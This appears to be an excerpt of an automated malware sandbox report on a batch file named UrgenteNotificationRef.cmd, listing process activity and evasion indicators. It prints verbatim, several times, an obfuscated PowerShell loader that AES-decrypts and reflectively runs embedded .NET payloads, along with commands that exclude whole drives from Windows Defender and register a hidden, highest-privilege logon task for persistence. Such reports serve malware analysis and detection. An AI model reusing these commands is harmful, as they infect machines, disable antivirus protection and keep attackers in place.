    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1602
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7224
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2413
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7504Thread sleep count: 4872 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7508Thread sleep count: 4860 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7660Thread sleep time: -18446744073709540s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7596Thread sleep count: 2120 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7592Thread sleep count: 197 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7640Thread sleep time: -1844674407370954s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7800Thread sleep time: -5534023222112862s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8000Thread sleep time: -7378697629483816s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8156Thread sleep time: -1844674407370954s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7000Thread sleep count: 5290 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7000Thread sleep count: 4490 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7816Thread sleep time: -25825441703193356s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7788Thread sleep count: 1295 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7764Thread sleep count: 1028 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7800Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7916Thread sleep time: -2767011611056431s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4340Thread sleep time: -8301034833169293s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8064Thread sleep time: -4611686018427385s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: powershell.exe, 0000001E.00000002.2113103855.0000000004A93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
    Source: powershell.exe, 0000001E.00000002.2113103855.0000000004A93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
    Source: powershell.exe, 0000001E.00000002.2113103855.0000000004A93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Adds a directory exclusion to Windows Defender
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\UrgenteNotificationRef.cmd" Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\UrgenteNotificationRef.cmd';$EErt='EntqgNmryqgNmPoiqgNmnqgNmtqgNm'.Replace('qgNm', ''),'CIZQNreIZQNatIZQNeDIZQNecIZQNryIZQNptIZQNorIZQN'.Replace('IZQN', ''),'FrobfNZmbfNZBasbfNZe6bfNZ4SbfNZtrbfNZinbfNZgbfNZ'.Replace('bfNZ', ''),'SplJahjitJahj'.Replace('Jahj', ''),'TriPkHansiPkHfiPkHoriPkHmFiPkHiiPkHnaiPkHlBliPkHoiPkHciPkHkiPkH'.Replace('iPkH', ''),'GetKBQbCurKBQbrenKBQbtPKBQbrKBQbocKBQbessKBQb'.Replace('KBQb', ''),'RyOcoeyOcoadyOcoLyOcoinyOcoesyOco'.Replace('yOco', ''),'LAguzoAguzadAguz'.Replace('Aguz', ''),'EleDcRNmenDcRNtDcRNAtDcRN'.Replace('DcRN', ''),'MalMOMilMOMnlMOMMolMOMdulMOMllMOMelMOM'.Replace('lMOM', ''),'ChaTLERngTLEReETLERxtTLERenTLERsTLERiTLERonTLER'.Replace('TLER', ''),'DeccotGomcotGpcotGrescotGscotG'.Replace('cotG', ''),'CopobqOyobqOTobqOoobqO'.Replace('obqO', ''),'InvClSOokeClSO'.Replace('ClSO', '');powershell -w hidden;function vTzfR($ukwVU){$hHysF=[System.Security.Cryptography.Aes]::Create();$hHysF.Mode=[System.Security.Cryptography.CipherMode]::CBC;$hHysF.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$hHysF.Key=[System.Convert]::($EErt[2])('zavfxzUUXNH4uECQXv0pvDIOSMJD8RFecmPDqbtRg9g=');$hHysF.IV=[System.Convert]::($EErt[2])('mi6yyZbC4Ex2I6/d7FQcGg==');$ovRQV=$hHysF.($EErt[1])();$BaeOu=$ovRQV.($EErt[4])($ukwVU,0,$ukwVU.Length);$ovRQV.Dispose();$hHysF.Dispose();$BaeOu;}function YlNft($ukwVU){$RVhbp=New-Object System.IO.MemoryStream(,$ukwVU);$YhZKJ=New-Object System.IO.MemoryStream;$XoHSZ=New-Object System.IO.Compression.GZipStream($RVhbp,[IO.Compression.CompressionMode]::($EErt[11]));$XoHSZ.($EErt[12])($YhZKJ);$XoHSZ.Dispose();$RVhbp.Dispose();$YhZKJ.Dispose();$YhZKJ.ToArray();}$JBgWB=[System.IO.File]::($EErt[6])([Console]::Title);$vBlXi=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 5).Substring(2))));$kasXC=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 6).Substring(2))));[System.Reflection.Assembly]::($EErt[7])([byte[]]$kasXC).($EErt[0]).($EErt[13])($null,$null);[System.Reflection.Assembly]::($EErt[7])([byte[]]$vBlXi).($EErt[0]).($EErt[13])($null,$null); "Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\Desktop\UrgenteNotificationRef')Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 28681' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network28681Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -ForceJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Network28681Man.cmd"Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Network28681Man.cmd"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Network28681Man.cmd';$EErt='EntqgNmryqgNmPoiqgNmnqgNmtqgNm'.Replace('qgNm', ''),'CIZQNreIZQNatIZQNeDIZQNecIZQNryIZQNptIZQNorIZQN'.Replace('IZQN', ''),'FrobfNZmbfNZBasbfNZe6bfNZ4SbfNZtrbfNZinbfNZgbfNZ'.Replace('bfNZ', ''),'SplJahjitJahj'.Replace('Jahj', ''),'TriPkHansiPkHfiPkHoriPkHmFiPkHiiPkHnaiPkHlBliPkHoiPkHciPkHkiPkH'.Replace('iPkH', ''),'GetKBQbCurKBQbrenKBQbtPKBQbrKBQbocKBQbessKBQb'.Replace('KBQb', ''),'RyOcoeyOcoadyOcoLyOcoinyOcoesyOco'.Replace('yOco', ''),'LAguzoAguzadAguz'.Replace('Aguz', ''),'EleDcRNmenDcRNtDcRNAtDcRN'.Replace('DcRN', ''),'MalMOMilMOMnlMOMMolMOMdulMOMllMOMelMOM'.Replace('lMOM', ''),'ChaTLERngTLEReETLERxtTLERenTLERsTLERiTLERonTLER'.Replace('TLER', ''),'DeccotGomcotGpcotGrescotGscotG'.Replace('cotG', ''),'CopobqOyobqOTobqOoobqO'.Replace('obqO', ''),'InvClSOokeClSO'.Replace('ClSO', '');powershell -w hidden;function vTzfR($ukwVU){$hHysF=[System.Security.Cryptography.Aes]::Create();$hHysF.Mode=[System.Security.Cryptography.CipherMode]::CBC;$hHysF.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$hHysF.Key=[System.Convert]::($EErt[2])('zavfxzUUXNH4uECQXv0pvDIOSMJD8RFecmPDqbtRg9g=');$hHysF.IV=[System.Convert]::($EErt[2])('mi6yyZbC4Ex2I6/d7FQcGg==');$ovRQV=$hHysF.($EErt[1])();$BaeOu=$ovRQV.($EErt[4])($ukwVU,0,$ukwVU.Length);$ovRQV.Dispose();$hHysF.Dispose();$BaeOu;}function YlNft($ukwVU){$RVhbp=New-Object System.IO.MemoryStream(,$ukwVU);$YhZKJ=New-Object System.IO.MemoryStream;$XoHSZ=New-Object System.IO.Compression.GZipStream($RVhbp,[IO.Compression.CompressionMode]::($EErt[11]));$XoHSZ.($EErt[12])($YhZKJ);$XoHSZ.Dispose();$RVhbp.Dispose();$YhZKJ.Dispose();$YhZKJ.ToArray();}$JBgWB=[System.IO.File]::($EErt[6])([Console]::Title);$vBlXi=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 5).Substring(2))));$kasXC=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 6).Substring(2))));[System.Reflection.Assembly]::($EErt[7])([byte[]]$kasXC).($EErt[0]).($EErt[13])($null,$null);[System.Reflection.Assembly]::($EErt[7])([byte[]]$vBlXi).($EErt[0]).($EErt[13])($null,$null); "
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\AppData\Roaming\Network28681Man')
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 28681' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network28681Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\desktop\urgentenotificationref.cmd';$eert='entqgnmryqgnmpoiqgnmnqgnmtqgnm'.replace('qgnm', ''),'cizqnreizqnatizqnedizqnecizqnryizqnptizqnorizqn'.replace('izqn', ''),'frobfnzmbfnzbasbfnze6bfnz4sbfnztrbfnzinbfnzgbfnz'.replace('bfnz', ''),'spljahjitjahj'.replace('jahj', ''),'tripkhansipkhfipkhoripkhmfipkhiipkhnaipkhlblipkhoipkhcipkhkipkh'.replace('ipkh', ''),'getkbqbcurkbqbrenkbqbtpkbqbrkbqbockbqbesskbqb'.replace('kbqb', ''),'ryocoeyocoadyocolyocoinyocoesyoco'.replace('yoco', ''),'laguzoaguzadaguz'.replace('aguz', ''),'eledcrnmendcrntdcrnatdcrn'.replace('dcrn', ''),'malmomilmomnlmommolmomdulmomllmomelmom'.replace('lmom', ''),'chatlerngtlereetlerxttlerentlerstleritlerontler'.replace('tler', ''),'deccotgomcotgpcotgrescotgscotg'.replace('cotg', ''),'copobqoyobqotobqooobqo'.replace('obqo', ''),'invclsookeclso'.replace('clso', '');powershell -w hidden;function vtzfr($ukwvu){$hhysf=[system.security.cryptography.aes]::create();$hhysf.mode=[system.security.cryptography.ciphermode]::cbc;$hhysf.padding=[system.security.cryptography.paddingmode]::pkcs7;$hhysf.key=[system.convert]::($eert[2])('zavfxzuuxnh4uecqxv0pvdiosmjd8rfecmpdqbtrg9g=');$hhysf.iv=[system.convert]::($eert[2])('mi6yyzbc4ex2i6/d7fqcgg==');$ovrqv=$hhysf.($eert[1])();$baeou=$ovrqv.($eert[4])($ukwvu,0,$ukwvu.length);$ovrqv.dispose();$hhysf.dispose();$baeou;}function ylnft($ukwvu){$rvhbp=new-object system.io.memorystream(,$ukwvu);$yhzkj=new-object system.io.memorystream;$xohsz=new-object system.io.compression.gzipstream($rvhbp,[io.compression.compressionmode]::($eert[11]));$xohsz.($eert[12])($yhzkj);$xohsz.dispose();$rvhbp.dispose();$yhzkj.dispose();$yhzkj.toarray();}$jbgwb=[system.io.file]::($eert[6])([console]::title);$vblxi=ylnft (vtzfr ([convert]::($eert[2])([system.linq.enumerable]::($eert[8])($jbgwb, 5).substring(2))));$kasxc=ylnft (vtzfr ([convert]::($eert[2])([system.linq.enumerable]::($eert[8])($jbgwb, 6).substring(2))));[system.reflection.assembly]::($eert[7])([byte[]]$kasxc).($eert[0]).($eert[13])($null,$null);[system.reflection.assembly]::($eert[7])([byte[]]$vblxi).($eert[0]).($eert[13])($null,$null); "
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" register-scheduledtask -taskname 'onenote 28681' -trigger (new-scheduledtasktrigger -atlogon) -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\network28681man.cmd') -settings (new-scheduledtasksettingsset -allowstartifonbatteries -hidden -executiontimelimit 0) -runlevel highest -force
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\network28681man.cmd';$eert='entqgnmryqgnmpoiqgnmnqgnmtqgnm'.replace('qgnm', ''),'cizqnreizqnatizqnedizqnecizqnryizqnptizqnorizqn'.replace('izqn', ''),'frobfnzmbfnzbasbfnze6bfnz4sbfnztrbfnzinbfnzgbfnz'.replace('bfnz', ''),'spljahjitjahj'.replace('jahj', ''),'tripkhansipkhfipkhoripkhmfipkhiipkhnaipkhlblipkhoipkhcipkhkipkh'.replace('ipkh', ''),'getkbqbcurkbqbrenkbqbtpkbqbrkbqbockbqbesskbqb'.replace('kbqb', ''),'ryocoeyocoadyocolyocoinyocoesyoco'.replace('yoco', ''),'laguzoaguzadaguz'.replace('aguz', ''),'eledcrnmendcrntdcrnatdcrn'.replace('dcrn', ''),'malmomilmomnlmommolmomdulmomllmomelmom'.replace('lmom', ''),'chatlerngtlereetlerxttlerentlerstleritlerontler'.replace('tler', ''),'deccotgomcotgpcotgrescotgscotg'.replace('cotg', ''),'copobqoyobqotobqooobqo'.replace('obqo', ''),'invclsookeclso'.replace('clso', '');powershell -w hidden;function vtzfr($ukwvu){$hhysf=[system.security.cryptography.aes]::create();$hhysf.mode=[system.security.cryptography.ciphermode]::cbc;$hhysf.padding=[system.security.cryptography.paddingmode]::pkcs7;$hhysf.key=[system.convert]::($eert[2])('zavfxzuuxnh4uecqxv0pvdiosmjd8rfecmpdqbtrg9g=');$hhysf.iv=[system.convert]::($eert[2])('mi6yyzbc4ex2i6/d7fqcgg==');$ovrqv=$hhysf.($eert[1])();$baeou=$ovrqv.($eert[4])($ukwvu,0,$ukwvu.length);$ovrqv.dispose();$hhysf.dispose();$baeou;}function ylnft($ukwvu){$rvhbp=new-object system.io.memorystream(,$ukwvu);$yhzkj=new-object system.io.memorystream;$xohsz=new-object system.io.compression.gzipstream($rvhbp,[io.compression.compressionmode]::($eert[11]));$xohsz.($eert[12])($yhzkj);$xohsz.dispose();$rvhbp.dispose();$yhzkj.dispose();$yhzkj.toarray();}$jbgwb=[system.io.file]::($eert[6])([console]::title);$vblxi=ylnft (vtzfr ([convert]::($eert[2])([system.linq.enumerable]::($eert[8])($jbgwb, 5).substring(2))));$kasxc=ylnft (vtzfr ([convert]::($eert[2])([system.linq.enumerable]::($eert[8])($jbgwb, 6).substring(2))));[system.reflection.assembly]::($eert[7])([byte[]]$kasxc).($eert[0]).($eert[13])($null,$null);[system.reflection.assembly]::($eert[7])([byte[]]$vblxi).($eert[0]).($eert[13])($null,$null); "
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" register-scheduledtask -taskname 'onenote 28681' -trigger (new-scheduledtasktrigger -atlogon) -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\network28681man.cmd') -settings (new-scheduledtasksettingsset -allowstartifonbatteries -hidden -executiontimelimit 0) -runlevel highest -force
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\desktop\urgentenotificationref.cmd';$eert='entqgnmryqgnmpoiqgnmnqgnmtqgnm'.replace('qgnm', ''),'cizqnreizqnatizqnedizqnecizqnryizqnptizqnorizqn'.replace('izqn', ''),'frobfnzmbfnzbasbfnze6bfnz4sbfnztrbfnzinbfnzgbfnz'.replace('bfnz', ''),'spljahjitjahj'.replace('jahj', ''),'tripkhansipkhfipkhoripkhmfipkhiipkhnaipkhlblipkhoipkhcipkhkipkh'.replace('ipkh', ''),'getkbqbcurkbqbrenkbqbtpkbqbrkbqbockbqbesskbqb'.replace('kbqb', ''),'ryocoeyocoadyocolyocoinyocoesyoco'.replace('yoco', ''),'laguzoaguzadaguz'.replace('aguz', ''),'eledcrnmendcrntdcrnatdcrn'.replace('dcrn', ''),'malmomilmomnlmommolmomdulmomllmomelmom'.replace('lmom', ''),'chatlerngtlereetlerxttlerentlerstleritlerontler'.replace('tler', ''),'deccotgomcotgpcotgrescotgscotg'.replace('cotg', ''),'copobqoyobqotobqooobqo'.replace('obqo', ''),'invclsookeclso'.replace('clso', '');powershell -w hidden;function vtzfr($ukwvu){$hhysf=[system.security.cryptography.aes]::create();$hhysf.mode=[system.security.cryptography.ciphermode]::cbc;$hhysf.padding=[system.security.cryptography.paddingmode]::pkcs7;$hhysf.key=[system.convert]::($eert[2])('zavfxzuuxnh4uecqxv0pvdiosmjd8rfecmpdqbtrg9g=');$hhysf.iv=[system.convert]::($eert[2])('mi6yyzbc4ex2i6/d7fqcgg==');$ovrqv=$hhysf.($eert[1])();$baeou=$ovrqv.($eert[4])($ukwvu,0,$ukwvu.length);$ovrqv.dispose();$hhysf.dispose();$baeou;}function ylnft($ukwvu){$rvhbp=new-object system.io.memorystream(,$ukwvu);$yhzkj=new-object system.io.memorystream;$xohsz=new-object system.io.compression.gzipstream($rvhbp,[io.compression.compressionmode]::($eert[11]));$xohsz.($eert[12])($yhzkj);$xohsz.dispose();$rvhbp.dispose();$yhzkj.dispose();$yhzkj.toarray();}$jbgwb=[system.io.file]::($eert[6])([console]::title);$vblxi=ylnft (vtzfr ([convert]::($eert[2])([system.linq.enumerable]::($eert[8])($jbgwb, 5).substring(2))));$kasxc=ylnft (vtzfr ([convert]::($eert[2])([system.linq.enumerable]::($eert[8])($jbgwb, 6).substring(2))));[system.reflection.assembly]::($eert[7])([byte[]]$kasxc).($eert[0]).($eert[13])($null,$null);[system.reflection.assembly]::($eert[7])([byte[]]$vblxi).($eert[0]).($eert[13])($null,$null); "Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" register-scheduledtask -taskname 'onenote 28681' -trigger (new-scheduledtasktrigger -atlogon) -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\network28681man.cmd') -settings (new-scheduledtasksettingsset -allowstartifonbatteries -hidden -executiontimelimit 0) -runlevel highest -forceJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\network28681man.cmd';$eert='entqgnmryqgnmpoiqgnmnqgnmtqgnm'.replace('qgnm', ''),'cizqnreizqnatizqnedizqnecizqnryizqnptizqnorizqn'.replace('izqn', ''),'frobfnzmbfnzbasbfnze6bfnz4sbfnztrbfnzinbfnzgbfnz'.replace('bfnz', ''),'spljahjitjahj'.replace('jahj', ''),'tripkhansipkhfipkhoripkhmfipkhiipkhnaipkhlblipkhoipkhcipkhkipkh'.replace('ipkh', ''),'getkbqbcurkbqbrenkbqbtpkbqbrkbqbockbqbesskbqb'.replace('kbqb', ''),'ryocoeyocoadyocolyocoinyocoesyoco'.replace('yoco', ''),'laguzoaguzadaguz'.replace('aguz', ''),'eledcrnmendcrntdcrnatdcrn'.replace('dcrn', ''),'malmomilmomnlmommolmomdulmomllmomelmom'.replace('lmom', ''),'chatlerngtlereetlerxttlerentlerstleritlerontler'.replace('tler', ''),'deccotgomcotgpcotgrescotgscotg'.replace('cotg', ''),'copobqoyobqotobqooobqo'.replace('obqo', ''),'invclsookeclso'.replace('clso', '');powershell -w hidden;function vtzfr($ukwvu){$hhysf=[system.security.cryptography.aes]::create();$hhysf.mode=[system.security.cryptography.ciphermode]::cbc;$hhysf.padding=[system.security.cryptography.paddingmode]::pkcs7;$hhysf.key=[system.convert]::($eert[2])('zavfxzuuxnh4uecqxv0pvdiosmjd8rfecmpdqbtrg9g=');$hhysf.iv=[system.convert]::($eert[2])('mi6yyzbc4ex2i6/d7fqcgg==');$ovrqv=$hhysf.($eert[1])();$baeou=$ovrqv.($eert[4])($ukwvu,0,$ukwvu.length);$ovrqv.dispose();$hhysf.dispose();$baeou;}function ylnft($ukwvu){$rvhbp=new-object system.io.memorystream(,$ukwvu);$yhzkj=new-object system.io.memorystream;$xohsz=new-object system.io.compression.gzipstream($rvhbp,[io.compression.compressionmode]::($eert[11]));$xohsz.($eert[12])($yhzkj);$xohsz.dispose();$rvhbp.dispose();$yhzkj.dispose();$yhzkj.toarray();}$jbgwb=[system.io.file]::($eert[6])([console]::title);$vblxi=ylnft (vtzfr ([convert]::($eert[2])([system.linq.enumerable]::($eert[8])($jbgwb, 5).substring(2))));$kasxc=ylnft (vtzfr ([convert]::($eert[2])([system.linq.enumerable]::($eert[8])($jbgwb, 6).substring(2))));[system.reflection.assembly]::($eert[7])([byte[]]$kasxc).($eert[0]).($eert[13])($null,$null);[system.reflection.assembly]::($eert[7])([byte[]]$vblxi).($eert[0]).($eert[13])($null,$null); "
